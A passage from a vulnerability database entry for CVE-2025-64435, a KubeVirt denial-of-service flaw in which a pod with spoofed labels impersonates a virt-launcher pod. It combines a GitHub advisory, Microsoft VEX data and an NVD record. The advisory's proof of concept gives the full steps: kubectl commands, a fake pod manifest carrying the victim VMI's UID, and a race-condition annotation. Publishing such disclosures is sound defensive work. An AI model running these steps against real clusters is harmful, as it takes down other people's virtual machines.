VMI.\n\t\t\tcontinue\n\t\t}\n\t\t// take the most recently created pod\n\t\tif curPod == nil || curPod.CreationTimestamp.Before(\u0026pod.CreationTimestamp) {\n\t\t\tcurPod = pod\n\t\t}\n\t}\n\treturn curPod, nil\n}\n```\n\n```go\n// 
pkg/controller/controller_ref.go\n\n\n// GetControllerOf returns the controllerRef if controllee has a controller,\n// otherwise returns nil.\nfunc GetControllerOf(pod *k8sv1.Pod) *metav1.OwnerReference {\n\tcontrollerRef := metav1.GetControllerOf(pod)\n\tif controllerRef != nil {\n\t\treturn controllerRef\n\t}\n\t// We may find pods that are only using CreatedByLabel and not set with an OwnerReference\n\tif createdBy := pod.Labels[virtv1.CreatedByLabel]; len(createdBy) \u003e 0 {\n\t\tname := pod.Annotations[virtv1.DomainAnnotation]\n\t\tuid := types.UID(createdBy)\n\t\tvmi := virtv1.NewVMI(name, uid)\n\t\treturn metav1.NewControllerRef(vmi, virtv1.VirtualMachineInstanceGroupVersionKind)\n\t}\n\treturn nil\n}\n\nfunc IsControlledBy(pod *k8sv1.Pod, vmi *virtv1.VirtualMachineInstance) bool {\n\tif controllerRef := GetControllerOf(pod); controllerRef != nil {\n\t\treturn controllerRef.UID == vmi.UID\n\t}\n\treturn false\n}\n```\n\nThe current logic assumes that a `virt-launcher` pod associated with a VMI may not always have a `controllerRef`. In such cases, the controller falls back to inspecting the pod\u0027s labels. Specifically it evaluates the `kubevirt.io/created-by` label, which is expected to match the UID of the VMI triggering the reconciliation loop. If multiple pods are found that could be associated with the same VMI, the `virt-controller` selects the most recently created one.\n\nThis logic appears to be designed with migration scenarios in mind, where it is expected that two `virt-launcher` pods might temporarily coexist for the same VMI: one for the migration source and one for the migration target node. However, a scenario was not identified in which a legitimate `virt-launcher` pod lacks a `controllerRef` and relies solely on labels (such as `kubevirt.io/created-by`) to indicate its association with a VMI.\n\nThis fallback behaviour introduces a security risk. 
If an attacker is able to obtain the UID of a running VMI and create a pod within the same namespace, they can assign it labels that mimic those of a legitimate `virt-launcher` pod. As a result, the `CurrentVMIPod` function could mistakenly return the attacker-controlled pod instead of the authentic one.\n\nThis vulnerability has at least two serious consequences:\n\n- The attacker could disrupt or seize control over the VMI\u0027s lifecycle operations.\n- The attacker could potentially influence the VMI\u0027s migration target node, bypassing node-level security constraints such as `nodeSelector` or `nodeAffinity`, which are typically used to enforce workload placement policies.\n\n### PoC\n_Complete instructions, including specific configuration details, to reproduce the vulnerability._\n\nConsider the following VMI definition:\n\n```yaml\napiVersion: kubevirt.io/v1\nkind: VirtualMachineInstance\nmetadata:\n name: launcher-label-confusion\nspec:\n domain:\n devices:\n disks:\n - name: containerdisk\n disk:\n bus: virtio\n - name: cloudinitdisk\n disk:\n bus: virtio\n resources:\n requests:\n memory: 1024M\n terminationGracePeriodSeconds: 0\n volumes:\n - name: containerdisk\n containerDisk:\n image: quay.io/kubevirt/cirros-container-disk-demo\n - name: cloudinitdisk \n cloudInitNoCloud:\n userDataBase64: SGkuXG4=\n```\n\n\n```bash\n# Deploy the launcher-label-confusion VMI\noperator@minikube:~$ kubectl apply -f launcher-confusion-labels.yaml\n# Get the UID of the VMI\noperator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath=\u0027{.metadata.uid}\u0027\n18afb8bf-70c4-498b-aece-35804c9a0d11\n# Find the UID of the associated to the VMI `virt-launcher` pods (ActivePods)\noperator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath=\u0027{.status.activePods}\u0027\n{\"674bc0b1-e3c7-4c05-b300-9e5744a5f2c8\":\"minikube\"}\n```\n\nThe UID of the VMI can also be found as an argument to the container in the `virt-launcher` pod:\n\n```bash\n# 
Inspect the `virt-launcher` pod associated with the VMI and the --uid CLI argument with which it was launched\noperator@minikube:~$ kubectl get pods virt-launcher-launcher-label-confusion-bdkwj -o jsonpath=\u0027{.spec.containers[0]}\u0027 | jq .\n{\n \"command\": [\n \"/usr/bin/virt-launcher-monitor\",\n ...\n \"--uid\",\n \"18afb8bf-70c4-498b-aece-35804c9a0d11\", \n \"--namespace\",\n \"default\",\n ...\n```\n\nConsider the following attacker-controlled pod which is associated to the VMI using the UID defined in the `kubevirt.io/created-by` label:\n\n```yaml\napiVersion: v1\nkind: Pod\nmetadata:\n name: fake-launcher\n labels:\n kubevirt.io: intruder # this is the label used by the virt-controller to identify pods associated with KubeVirt components\n kubevirt.io/created-by: 18afb8bf-70c4-498b-aece-35804c9a0d11 # this is the UID of the launcher-label-confusion VMI which is going to be taken into account if there is no ownerReference. This is the case for regular pods\n kubevirt.io/domain: migration\nspec:\n restartPolicy: Never\n containers:\n - name: alpine\n image: alpine\n command: [ \"sleep\", \"3600\" ]\n```\n\n```bash\noperator@minikube:~$ kubectl apply -f fake-launcher.yaml\n# Get the UID of the `fake-launcher` pod\noperator@minikube:~$ kubectl get pod fake-launcher -o jsonpath=\u0027{.metadata.uid}\u0027\n39479b87-3119-43b5-92d4-d461b68cfb13\n```\n\nTo effectively attach the fake pod to the VMI, the attacker should wait for a state update to trigger the reconciliation loop:\n\n```bash\n# Trigger the VMI reconciliation loop\noperator@minikube:~$ kubectl patch vmi launcher-label-confusion -p \u0027{\"metadata\":{\"annotations\":{\"trigger-annotation\":\"quarkslab\"}}}\u0027 --type=merge\nvirtualmachineinstance.kubevirt.io/launcher-label-confusion patched\n# Confirm that fake-launcher pod has been associated with the VMI\noperator@minikube:~$ kubectl get vmi launcher-label-confusion -o 
jsonpath=\u0027{.status.activePods}\u0027\n{\"39479b87-3119-43b5-92d4-d461b68cfb13\":\"minikube\", # `fake-launcher` pod\u0027s UID\n\"674bc0b1-e3c7-4c05-b300-9e5744a5f2c8\":\"minikube\"} # original `virt-launcher` pod UID\n```\n\n\nTo illustrate the impact of this vulnerability, a race condition will be triggered in the `sync` function of the VMI controller:\n\n\n```go\n// pkg/virt-controller/watch/vmi.go\n\nfunc (c *Controller) sync(vmi *virtv1.VirtualMachineInstance, pod *k8sv1.Pod, dataVolumes []*cdiv1.DataVolume) (common.SyncError, *k8sv1.Pod) {\n //...\n if !isTempPod(pod) \u0026\u0026 controller.IsPodReady(pod) {\n\n\t\t// mark the pod with annotation to be evicted by this controller\n\t\tnewAnnotations := map[string]string{descheduler.EvictOnlyAnnotation: \"\"}\n\t\tmaps.Copy(newAnnotations, c.netAnnotationsGenerator.GenerateFromActivePod(vmi, pod))\n // here a new updated pod is returned\n\t\tpatchedPod, err := c.syncPodAnnotations(pod, newAnnotations)\n\t\tif err != nil {\n\t\t\treturn common.NewSyncError(err, controller.FailedPodPatchReason), pod\n\t\t}\n\t\tpod = patchedPod\n // ...\n\nfunc (c *Controller) syncPodAnnotations(pod *k8sv1.Pod, newAnnotations map[string]string) (*k8sv1.Pod, error) {\n\tpatchSet := patch.New()\n\tfor key, newValue := range newAnnotations {\n\t\tif podAnnotationValue, keyExist := pod.Annotations[key]; !keyExist || podAnnotationValue != newValue {\n\t\t\tpatchSet.AddOption(\n\t\t\t\tpatch.WithAdd(fmt.Sprintf(\"/metadata/annotations/%s\", patch.EscapeJSONPointer(key)), newValue),\n\t\t\t)\n\t\t}\n\t}\n\tif patchSet.IsEmpty() {\n\t\treturn pod, nil\n\t}\n\t\n\tpatchBytes, err := patchSet.GeneratePayload()\n\t// ...\n\tpatchedPod, err := c.clientset.CoreV1().Pods(pod.Namespace).Patch(context.Background(), pod.Name, types.JSONPatchType, patchBytes, v1.PatchOptions{})\n // ...\n\treturn patchedPod, nil\n}\n```\n\nThe above code adds additional annotations to the `virt-launcher` pod related to node eviction. 
This happens via an API call to Kubernetes which upon success returns a new updated pod object. This object replaces the current one in the execution flow.\nThere is a tiny window where an attacker could trigger a race condition which will mark the VMI as failed:\n\n```go\n// pkg/virt-controller/watch/vmi.go\n\nfunc isTempPod(pod *k8sv1.Pod) bool {\n // EphemeralProvisioningObject string = \"kubevirt.io/ephemeral-provisioning\"\n\t_, ok := pod.Annotations[virtv1.EphemeralProvisioningObject]\n\treturn ok\n}\n```\n\n```go\n// pkg/virt-controller/watch/vmi.go\n\nfunc (c *Controller) updateStatus(vmi *virtv1.VirtualMachineInstance, pod *k8sv1.Pod, dataVolumes []*cdiv1.DataVolume, syncErr common.SyncError) error {\n // ...\n vmiPodExists := controller.PodExists(pod) \u0026\u0026 !isTempPod(pod)\n\ttempPodExists := controller.PodExists(pod) \u0026\u0026 isTempPod(pod)\n\n //...\n case vmi.IsRunning():\n\t\tif !vmiPodExists {\n // MK: this will toggle the VMI phase to Failed\n\t\t\tvmiCopy.Status.Phase = virtv1.Failed\n\t\t\tbreak\n\t\t}\n //...\n\n vmiChanged := !equality.Semantic.DeepEqual(vmi.Status, vmiCopy.Status) || !equality.Semantic.DeepEqual(vmi.Finalizers, vmiCopy.Finalizers) || !equality.Semantic.DeepEqual(vmi.Annotations, vmiCopy.Annotations) || !equality.Semantic.DeepEqual(vmi.Labels, vmiCopy.Labels)\n\tif vmiChanged {\n // MK: this will detect that the phase of the VMI has changed and updated the resource\n\t\tkey := controller.VirtualMachineInstanceKey(vmi)\n\t\tc.vmiExpectations.SetExpectations(key, 1, 0)\n\t\t_, err := c.clientset.VirtualMachineInstance(vmi.Namespace).Update(context.Background(), vmiCopy, v1.UpdateOptions{})\n\t\tif err != nil {\n\t\t\tc.vmiExpectations.LowerExpectations(key, 1, 0)\n\t\t\treturn err\n\t\t}\n\t}\n```\n\nTo trigger it, the attacker should update the `fake-launcher` pod\u0027s annotations before the check `vmiPodExists := controller.PodExists(pod) \u0026\u0026 !isTempPod(pod)` in `sync`, and between the check `if 
!isTempPod(pod) \u0026\u0026 controller.IsPodReady(pod)` in `sync` but before the patch API call in `syncPodAnnotations` as follows:\n\n```yaml\nannotations:\n kubevirt.io/ephemeral-provisioning: \"true\"\n```\n\nThe above annotation will mark the attacker pod as ephemeral (i.e., used to provision the VMI) and will fail the VMI as the latter is already running (provisioning happens before the VMI starts running).\n\nThe update should also happen during the reconciliation loop when the `fake-launcher` pod is initially going to be associated with the VMI and its labels, related to eviction, updated.\n\n\nUpon successful exploitation the VMI is marked as failed and could not be controlled via the Kubernetes API. However, the QEMU process is still running and the VMI is still present in the cluster:\n\n\n```bash\noperator@minikube:~$ kubectl get vmi\nNAME AGE PHASE IP NODENAME READY\nlauncher-label-confusion 128m Failed 10.244.0.10 minikube False\n# The VMI is not reachable anymore \noperator@minikube:~$ virtctl console launcher-label-confusion\nOperation cannot be fulfilled on virtualmachineinstance.kubevirt.io \"launcher-label-confusion\": VMI is in failed status\n\n# The two pods are still associated with the VMI\n\noperator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath=\u0027{.status.activePods}\u0027 \n{\"674bc0b1-e3c7-4c05-b300-9e5744a5f2c8\":\"minikube\",\"ca31c8de-4d14-4e47-b942-75be20fb9d96\":\"minikube\"}\n```\n\n### Impact\nAs a result, an attacker could provoke a DoS condition for the affected VMI, compromising the availability of the services it provides.",
"id": "GHSA-9m94-w2vq-hcf9",
"modified": "2025-11-17T21:43:42Z",
"published": "2025-11-06T23:35:24Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-9m94-w2vq-hcf9"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64435"
},
{
"type": "WEB",
"url": "https://github.com/kubevirt/kubevirt/commit/9a6f4a3a707992038ef705da4cb3bba8c89d36ba"
},
{
"type": "PACKAGE",
"url": "https://github.com/kubevirt/kubevirt"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "KubeVirt VMI Denial-of-Service (DoS) Using Pod Impersonation"
}
MSRC_CVE-2025-64435
Vulnerability from csaf_microsoft - Published: 2025-11-02 00:00 - Updated: 2026-01-08 14:37Notes
{
"document": {
"category": "csaf_vex",
"csaf_version": "2.0",
"distribution": {
"text": "Public",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en-US",
"notes": [
{
"category": "general",
"text": "To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle",
"title": "Additional Resources"
},
{
"category": "legal_disclaimer",
"text": "The information provided in the Microsoft Knowledge Base is provided \\\"as is\\\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.",
"title": "Disclaimer"
}
],
"publisher": {
"category": "vendor",
"contact_details": "secure@microsoft.com",
"name": "Microsoft Security Response Center",
"namespace": "https://msrc.microsoft.com"
},
"references": [
{
"category": "self",
"summary": "CVE-2025-64435 KubeVirt VMI Denial-of-Service (DoS) Using Pod Impersonation - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2025/msrc_cve-2025-64435.json"
},
{
"category": "external",
"summary": "Microsoft Support Lifecycle",
"url": "https://support.microsoft.com/lifecycle"
},
{
"category": "external",
"summary": "Common Vulnerability Scoring System",
"url": "https://www.first.org/cvss"
}
],
"title": "KubeVirt VMI Denial-of-Service (DoS) Using Pod Impersonation",
"tracking": {
"current_release_date": "2026-01-08T14:37:49.000Z",
"generator": {
"date": "2026-02-18T14:58:53.121Z",
"engine": {
"name": "MSRC Generator",
"version": "1.0"
}
},
"id": "msrc_CVE-2025-64435",
"initial_release_date": "2025-11-02T00:00:00.000Z",
"revision_history": [
{
"date": "2025-11-09T01:02:03.000Z",
"legacy_version": "1",
"number": "1",
"summary": "Information published."
},
{
"date": "2025-12-06T14:39:37.000Z",
"legacy_version": "2",
"number": "2",
"summary": "Information published."
},
{
"date": "2025-12-07T01:48:08.000Z",
"legacy_version": "3",
"number": "3",
"summary": "Information published."
},
{
"date": "2025-12-15T14:35:26.000Z",
"legacy_version": "4",
"number": "4",
"summary": "Information published."
},
{
"date": "2025-12-23T01:37:09.000Z",
"legacy_version": "5",
"number": "5",
"summary": "Information published."
},
{
"date": "2026-01-02T14:39:36.000Z",
"legacy_version": "6",
"number": "6",
"summary": "Information published."
},
{
"date": "2026-01-08T14:37:49.000Z",
"legacy_version": "7",
"number": "7",
"summary": "Information published."
}
],
"status": "final",
"version": "7"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "3.0",
"product": {
"name": "Azure Linux 3.0",
"product_id": "17084"
}
},
{
"category": "product_version",
"name": "2.0",
"product": {
"name": "CBL Mariner 2.0",
"product_id": "17086"
}
}
],
"category": "product_name",
"name": "Azure Linux"
},
{
"branches": [
{
"category": "product_version_range",
"name": "azl3 kubevirt 1.5.0-5",
"product": {
"name": "azl3 kubevirt 1.5.0-5",
"product_id": "5"
}
},
{
"category": "product_version_range",
"name": "cbl2 kubevirt 0.59.0-30",
"product": {
"name": "cbl2 kubevirt 0.59.0-30",
"product_id": "6"
}
},
{
"category": "product_version_range",
"name": "\u003cazl3 kubevirt 1.5.3-2",
"product": {
"name": "\u003cazl3 kubevirt 1.5.3-2",
"product_id": "4"
}
},
{
"category": "product_version",
"name": "azl3 kubevirt 1.5.3-2",
"product": {
"name": "azl3 kubevirt 1.5.3-2",
"product_id": "20673"
}
},
{
"category": "product_version_range",
"name": "\u003ccbl2 kubevirt 0.59.0-31",
"product": {
"name": "\u003ccbl2 kubevirt 0.59.0-31",
"product_id": "3"
}
},
{
"category": "product_version",
"name": "cbl2 kubevirt 0.59.0-31",
"product": {
"name": "cbl2 kubevirt 0.59.0-31",
"product_id": "20703"
}
},
{
"category": "product_version_range",
"name": "\u003ccbl2 kubevirt 0.59.0-33",
"product": {
"name": "\u003ccbl2 kubevirt 0.59.0-33",
"product_id": "2"
}
},
{
"category": "product_version",
"name": "cbl2 kubevirt 0.59.0-33",
"product": {
"name": "cbl2 kubevirt 0.59.0-33",
"product_id": "20772"
}
},
{
"category": "product_version_range",
"name": "\u003cazl3 kubevirt 1.6.3-1",
"product": {
"name": "\u003cazl3 kubevirt 1.6.3-1",
"product_id": "1"
}
},
{
"category": "product_version",
"name": "azl3 kubevirt 1.6.3-1",
"product": {
"name": "azl3 kubevirt 1.6.3-1",
"product_id": "20792"
}
}
],
"category": "product_name",
"name": "kubevirt"
}
],
"category": "vendor",
"name": "Microsoft"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "azl3 kubevirt 1.5.0-5 as a component of Azure Linux 3.0",
"product_id": "17084-5"
},
"product_reference": "5",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cbl2 kubevirt 0.59.0-30 as a component of CBL Mariner 2.0",
"product_id": "17086-6"
},
"product_reference": "6",
"relates_to_product_reference": "17086"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003cazl3 kubevirt 1.5.3-2 as a component of Azure Linux 3.0",
"product_id": "17084-4"
},
"product_reference": "4",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "azl3 kubevirt 1.5.3-2 as a component of Azure Linux 3.0",
"product_id": "20673-17084"
},
"product_reference": "20673",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003ccbl2 kubevirt 0.59.0-31 as a component of CBL Mariner 2.0",
"product_id": "17086-3"
},
"product_reference": "3",
"relates_to_product_reference": "17086"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cbl2 kubevirt 0.59.0-31 as a component of CBL Mariner 2.0",
"product_id": "20703-17086"
},
"product_reference": "20703",
"relates_to_product_reference": "17086"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003ccbl2 kubevirt 0.59.0-33 as a component of CBL Mariner 2.0",
"product_id": "17086-2"
},
"product_reference": "2",
"relates_to_product_reference": "17086"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cbl2 kubevirt 0.59.0-33 as a component of CBL Mariner 2.0",
"product_id": "20772-17086"
},
"product_reference": "20772",
"relates_to_product_reference": "17086"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003cazl3 kubevirt 1.6.3-1 as a component of Azure Linux 3.0",
"product_id": "17084-1"
},
"product_reference": "1",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "azl3 kubevirt 1.6.3-1 as a component of Azure Linux 3.0",
"product_id": "20792-17084"
},
"product_reference": "20792",
"relates_to_product_reference": "17084"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-64435",
"cwe": {
"id": "CWE-703",
"name": "Improper Check or Handling of Exceptional Conditions"
},
"notes": [
{
"category": "general",
"text": "GitHub_M",
"title": "Assigning CNA"
}
],
"product_status": {
"fixed": [
"20673-17084",
"20703-17086",
"20772-17086",
"20792-17084"
],
"known_affected": [
"17084-5",
"17086-6",
"17084-4",
"17086-3",
"17086-2",
"17084-1"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-64435 KubeVirt VMI Denial-of-Service (DoS) Using Pod Impersonation - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2025/msrc_cve-2025-64435.json"
}
],
"remediations": [
{
"category": "none_available",
"date": "2025-11-09T01:02:03.000Z",
"details": "There is no fix available for this vulnerability as of now",
"product_ids": [
"17084-5"
]
},
{
"category": "none_available",
"date": "2025-11-09T01:02:03.000Z",
"details": "There is no fix available for this vulnerability as of now",
"product_ids": [
"17086-6"
]
},
{
"category": "vendor_fix",
"date": "2025-11-09T01:02:03.000Z",
"details": "1.5.3-3:Security Update:https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade",
"product_ids": [
"17084-4"
],
"url": "https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade"
},
{
"category": "vendor_fix",
"date": "2025-11-09T01:02:03.000Z",
"details": "0.59.0-33:Security Update:https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade",
"product_ids": [
"17086-3",
"17086-2"
],
"url": "https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade"
},
{
"category": "vendor_fix",
"date": "2025-11-09T01:02:03.000Z",
"details": "1.6.3-1:Security Update:https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade",
"product_ids": [
"17084-1"
],
"url": "https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"environmentalsScore": 0.0,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"temporalScore": 5.3,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"17084-5",
"17086-6",
"17084-4",
"17086-3",
"17086-2",
"17084-1"
]
}
],
"title": "KubeVirt VMI Denial-of-Service (DoS) Using Pod Impersonation"
}
]
}
FKIE_CVE-2025-64435
Vulnerability from fkie_nvd - Published: 2025-11-07 23:15 - Updated: 2025-11-25 17:15{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubevirt:kubevirt:*:*:*:*:*:kubernetes:*:*",
"matchCriteriaId": "5115F453-4A3D-438D-A8F3-94C5E8451F45",
"versionEndIncluding": "1.6.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:kubevirt:kubevirt:1.7.0:alpha0:*:*:*:kubernetes:*:*",
"matchCriteriaId": "6C13B76B-290B-4D75-AF75-54FEC43B75C4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.7.0-beta.0, a logic flaw in the virt-controller allows an attacker to disrupt the control over a running VMI by creating a pod with the same labels as the legitimate virt-launcher pod associated with the VMI. This can mislead the virt-controller into associating the fake pod with the VMI, resulting in incorrect status updates and potentially causing a DoS (Denial-of-Service). This vulnerability is fixed in 1.7.0-beta.0."
},
{
"lang": "es",
"value": "KubeVirt es un complemento de gesti\u00f3n de m\u00e1quinas virtuales para Kubernetes. Antes de la versi\u00f3n 1.7.0-beta.0, un fallo l\u00f3gico en el virt-controller permite a un atacante interrumpir el control sobre una VMI en ejecuci\u00f3n al crear un pod con las mismas etiquetas que el pod virt-launcher leg\u00edtimo asociado a la VMI. Esto puede inducir a error al virt-controller para que asocie el pod falso con la VMI, lo que resulta en actualizaciones de estado incorrectas y potencialmente causando un DoS (Denial-of-Service). Esta vulnerabilidad est\u00e1 corregida en la versi\u00f3n 1.7.0-beta.0."
}
],
"id": "CVE-2025-64435",
"lastModified": "2025-11-25T17:15:44.140",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.6,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2025-11-07T23:15:45.850",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/kubevirt/kubevirt/commit/9a6f4a3a707992038ef705da4cb3bba8c89d36ba"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-9m94-w2vq-hcf9"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-703"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.